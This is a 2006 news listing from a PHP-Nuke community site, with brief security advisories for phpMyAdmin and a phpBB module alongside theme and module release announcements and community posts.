Great Reviews!Need help setting up your website, installing Apache, PHP, MySQL, or RavenNuke(tm)?Need help customizing or designing scripts?Please contact us via the Contact Us option for further details and pricing.
DESCRIPTION:
Two vulnerabilities have been reported in phpMyAdmin, which can be exploited by malicious people to conduct cross-site scripting attacks.
1) Input passed to the "theme" parameter isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerability has been reported in versions prior to 2.8.0.4 for the 2.8.0 branch.
2) Input passed to the "db" parameter isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerability has been reported in some versions prior to 2.8.0.4.
SOLUTION: Update to version 2.8.0.4.
http://www.phpmyadmin.net/home_page/downloads.php
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
2) The vendor credits Sven Vetsch/Disenchant.
ORIGINAL ADVISORY:
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2006-2
Posted by Raven on Monday, May 15, 2006 @ 09:04:05 EDT (456 reads) ( | Score: 0)
DESCRIPTION:
Kurdish Security has discovered some vulnerabilities in the foing module for phpBB, which can be exploited by malicious people to compromise a vulnerable system.
Input passed to the "phpbb_root_path" parameter in index.php,song.php, faq.php, list.php, gen_m3u.php, and playlist.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.
The vulnerabilities have been confirmed in version 0.7.0 and have also been reported in versions 0.6.0, 0.5.0, 0.4.0, 0.3.0, and 0.2.0. Other versions may also be affected.
SOLUTION: Edit the source code to ensure that input is properly verified.
Use another product.
PROVIDED AND/OR DISCOVERED BY: Kurdish Security
ORIGINAL ADVISORY:
http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html
Posted by Raven on Monday, May 15, 2006 @ 08:57:44 EDT (647 reads) ( | Score: 5)
Content Plus 1.0.0 Released, Get Your Copy Now!
slaytanic_wehrmacht writes "Content Plus is a mega enhanced version of PHP-Nuke's default Content Module, have a lot of new features and also more eye-candy.
Features:
- Users can add new pages. - Ability to export content as PDF - Users can share page with friends. - Users can get a printer friendly page. - Improved the eye-candy.
Get your copy Right Now!"
Posted by Raven on Monday, May 15, 2006 @ 01:18:18 EDT (777 reads) (Read More... | 689 bytes more | Score: 3)
My opinion of the Nuke Community
pcnuke writes "My opinion of the Nuke Community(www.pcnuke.com):
Date: 05.14.06
One thing the team at PCN Systems has found out working with the PHP-Nuke portal system (in our short time within the community) is that it will never be up to date & can have many security issues. While members & staff of this website enjoy using phpnuke and variations of the program. Part of the fun of it is messing with it, and converting sections of it they way you want it to be. They main thing you must remember is that its a free program and is Open Source, so you can distribute it, and change it, and any addons created for it, anyway you would like. Many people will use it as BASIS to develop a new FORK from, converting areas of the code they way they choose. We want everyone here at www.pcnuke.com to know that versions found on our website are not FORKS, they are truly php-nuke based at heart, and any addon created for phpnuke will always work with all systems found on this website.
The main reason for the programs flaws are caused from its developer and bad coding he releases to the public. While the overall idea of the system is great and I mean no dis-respect to the developer of PHP-Nuke (FB) www.phpnuke.org , the program could be made better by its dev... by rechecking its operations in a couple of browsers, prior to releasing it to the public. Remember Php-Nuke is also a fork created from a previous open source poratl system."
Posted by Raven on Monday, May 15, 2006 @ 01:16:40 EDT (1117 reads) (Read More... | 6612 bytes more | Score: 0)
New Themes from DesignWicked and Phpcusa
refiner writes "Themes PH-APOTHUS BLUE AND PH-APOTHUS RED have benn released today, both theme are tech looking and come with matchin forum, flash nav in the header (links can be changed thru the text file nav.txt) second flash menu in the footer, scrolling download and weblink, forum header with flash nav. You can see both theme and all other Phpcusa & DesignWicked theme at newly opened phpcusa themes site Phpcusa & DesignWicked Themes. PHAPOTHUS BLUE is named PH-APOTHUSB. PHAPOTHUS RED is named PH-APOTHUSR."
Posted by Raven on Monday, May 15, 2006 @ 01:09:51 EDT (386 reads) ( | Score: 0)
Myheadlines v 4.3.2 Release Candidate 1: the great syndicated news-engine
nukeevangelist writes "good news from jmagar.com - celebrate the long development of the MyHeadlinesmodule [change-log ]
travel to the developersite jmagar.com and read good news about Myheadlines v 4.3.2 Release Candidate 1
Mike Agar: "I'm now testing the latest version of MyHeadlines. There are so many changes and improvements that I want to work out the kinks before going public with it. Also the jokers at SourceForge are having difficulty with the CVS servers so I can't commit my changes, and thus am unable to make a proper release. Not to worry, in about 2 weeks we'll make this public, and I'll even include my latest source tree in OPML Format!"
at the developersite you can see the long change-log "
Posted by Raven on Saturday, May 13, 2006 @ 22:52:06 EDT (395 reads) ( | Score: 0)
BlueOcean FREE PHPNuke theme released by SDDesign.biz
Slashdot writes "Hello.
We have just released our newest FREE PHP Nuke Theme - "BlueOcean".
As the name suggests the theme is based on various shades of blue. This is
unlike any of our previous productions because it doesn't have the glamour or
the flash flickers in it.
The theme is based on simplicity and is clean & elegant.
The theme comes with Header source files in .psd format. Also included the
forum icons and buttons source files.
We will soon be releasing a few more themes of the similar category.
Thank you"
Posted by Raven on Saturday, May 13, 2006 @ 22:51:12 EDT (813 reads) ( | Score: 0)
Pc-Nuke! releases updated version of Xtreme! and...
pcnuke writes "Pc-Nuke! welcomes everyone to the latest release of the Xtreme! portal system. PCN-Xtreme! is based from PHP-Nuke by phpnuke.org and is over 25% smaller in size that the previous issue. These releases are built on our revised v7.9, with Patched Series 3.1 (official chatserv) and BBtoNuke v2.0.20 applied, and added features and security!
PCN-Xtreme! incorporates numerous upgrades from various developers which are listed in the MENU/VERSIONS link in our menu on the left-side column, plus you can link to a DEMO site on our frontpage. Some of the contents included are: PCN Advertising System, V3 Arcade, MultiPlex Center, Staff, Donations, Photo Gallery, Downloads, Reviews, Web Links, Topics, Work Board, Webstats, Events Calendar, Shoutbox, Your Account, phpBB 2.0.20 forum, Forum Ranks, Rules, Legal Docs, Contact Plus, Admin Email Lists, Ban Request, Games Room, Center HTMLs, Scrollers, News Feeds, over 80+ blocks and much more. We've also incorporated into PCN-Xtreme! v7.9.031d our Blacky & Gunpowder, among other themes and a large amount of useful items."
Posted by Raven on Saturday, May 13, 2006 @ 22:49:16 EDT (882 reads) (Read More... | 2540 bytes more | Score: 0)
Important Change!!
If you are running NukeSentinel(tm) and you haven't noticed, IANA has started releasing many of the formerly Reserved ranges. To help you not block real people(including me) from visiting your sites, run the following queries on your database to clear the released ranges:
Posted by BobMarion on Saturday, May 13, 2006 @ 03:30:42 EDT (1386 reads) (Read More... | 1457 bytes more | Score: 5)
Nuke Royal - E-Solution
Guardian2003 writes "As some of you may be aware, when NukeRoyal/ E-Solution first came out I was available on the authors site to answer support questions and generally 'help out'.
Over the last few months I have had numerous emails, private messages and seen numerous complaints on the authors support forum etc which contained information that causes me concern."
Posted by Raven on Thursday, May 11, 2006 @ 09:30:41 EDT (1569 reads) (Read More... | 1393 bytes more | Score: 5)
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
